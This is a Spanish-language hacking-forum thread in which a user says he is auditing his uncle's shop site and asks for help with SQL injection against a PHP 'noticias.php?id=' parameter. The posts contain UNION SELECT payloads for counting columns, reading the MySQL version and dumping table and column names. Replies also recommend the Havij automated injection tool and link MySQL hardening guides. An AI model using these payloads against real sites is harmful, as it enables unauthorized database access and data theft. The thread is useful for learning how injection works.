[SQLi]Problema al obtener informationschema.tables

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

[SQLi]Problema al obtener informationschema.tables

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1] 2

Autor

Tema: [SQLi]Problema al obtener informationschema.tables (Leído 7,096 veces)

Debci

Wiki

Desconectado

Mensajes: 2.021

Actualizate o muere!

[SQLi]Problema al obtener informationschema.tables

« en: 25 Agosto 2010, 22:23 pm »

Buenas a todos, estoy auditando un sistema web casera de la tienda de mi tio, me dijo que lo podia usar para hacer pruebas si no modificaba nada >:D

La cuestión es que encontré varias fallas SQLi, y ahora quiero simular la explotación o por lo menos obtener datos interesantes, primero comprové que la variable ID era vulnerable:

Código:

noticias.php?id='1

Y devolvió error!

Luego me aseguré de ver que tablas eran vulnerables y en la numero 7 pude observar que me devolvia 2,4,5

Código:

noticias.php?id=-1+union+select+1,2,3,4,5,6,7--

Así que procedí a obtener la information_schema, pero antes comprobar la versión:

Código:

noticias.php?id=id=-1+union+select+1,@@version,3,4,5,6,7--

Y me deolvió:
4.0.27-max-log

Y según se, este mysql no trae information_schema , cierto? Ya me confirmarán.
Ahora viene el problema, intento obtener tablas de information_schema:

Código:

noticias.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--

Pero tan solo obtengo:

Citar

Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(table_name),3,4,5,6,7 from information_schema.tables--' at lin

Que estoy haciendo mal? Juraria que la querie esta bien formulada pero no soy muy dado a los SQLi :S

Saludos


	En línea

Leyer

Desconectado

Mensajes: 786

leyer@elhacker.net

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #1 en: 25 Agosto 2010, 22:28 pm »

information_schema.tables no esta en la version 4 tendras que hacerlo a ciegas XD


	En línea

https://jleyer.wordpress.com/

Debci

Wiki

Desconectado

Mensajes: 2.021

Actualizate o muere!

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #2 en: 25 Agosto 2010, 22:30 pm »

Cita de: LEYER en 25 Agosto 2010, 22:28 pm

information_schema.tables no esta en la version 4 tendras que hacerlo a ciegas XD

Osea que pruebe nombres de tablas a lo loco?

Saludos


	En línea

Leyer

Desconectado

Mensajes: 786

leyer@elhacker.net

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #3 en: 25 Agosto 2010, 22:35 pm »


	En línea

https://jleyer.wordpress.com/

Debci

Wiki

Desconectado

Mensajes: 2.021

Actualizate o muere!

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #4 en: 25 Agosto 2010, 22:37 pm »

No si ya lo dicen los expertos, hay que tener todo actualizado... que si no las cosas se hacen mas dificiles... :¬¬

Alguien podria decirme si es factible bruteforce o alguna lista de defaults?

Saludos


	En línea

Leyer

Desconectado

Mensajes: 786

leyer@elhacker.net

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #5 en: 25 Agosto 2010, 23:24 pm »

http://pastebin.com/3SR7vT30


	En línea

https://jleyer.wordpress.com/

Debci

Wiki

Desconectado

Mensajes: 2.021

Actualizate o muere!

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #6 en: 26 Agosto 2010, 00:07 am »

Muchisimas gracias

Saludos


	En línea

tragantras

Desconectado

Mensajes: 465

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #7 en: 26 Agosto 2010, 01:44 am »

la práctica de actualizar el software es FUNDAMENTAL, el hecho es que con más funcionalidad vienen más peligros.

el acceso a information_schema NUNCA debería ser posible desde un usuario creado para una web, de hecho solo debería poder acceder a la tabla para la cual ha sido creado, separando la de login, y sobre todo SOLO selects, nada de updates blablablá

te recomiendo usar "Havij" es un programa muy útil, te comprueba automáticamente la existencia de ciertas tablas, viene con su propio diccionario y peude ser aumentado facilmente.

así mismo para todos:

http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-13.html
http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-23.html


« Última modificación: 26 Agosto 2010, 01:46 am por tragantras »	En línea

Colaboraciones:
1 2

Debci

Wiki

Desconectado

Mensajes: 2.021

Actualizate o muere!

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #8 en: 26 Agosto 2010, 10:23 am »

Cita de: tragantras en 26 Agosto 2010, 01:44 am

Muchas gracias por la información

Saludos


	En línea

Lavacaloca

Desconectado

Mensajes: 21

Re: [SQLi]Problema al obtener informationschema.tables

« Respuesta #9 en: 24 Julio 2011, 17:52 pm »

Y porque no haces:

id='+union+select+all+1,table_name,3,4,5,6,7+from+information_schema.tables--

¿?¿?

(después pones id='+union+...+1,group_concat(column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=char(TEXTO EN ASCCI)--)


	En línea

Sigo buscando información y/o posibles soluciones para abrir un puerto en el modem Huawei echolife Hg520c

Páginas: [1] 2

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Problema con SQLI Helper Hacking	Nardo[N]	5	6,097	24 Febrero 2011, 04:32 am por Nardo[N]
	Problema SQLi real/practico Nivel Web	Søra	4	4,129	23 Septiembre 2011, 23:59 pm por ~ Yoya ~
	Problema Sqli Seguridad	overxfl0w13	0	2,001	27 Noviembre 2012, 21:19 pm por overxfl0w13
	Problema SQLI - Error 404 Nivel Web	sqln00b	2	3,199	28 Julio 2015, 05:04 am por Shell Root
	problema con sql y sqli « 1 2 » PHP	mxsoun	15	8,329	27 Julio 2017, 02:37 am por mxsoun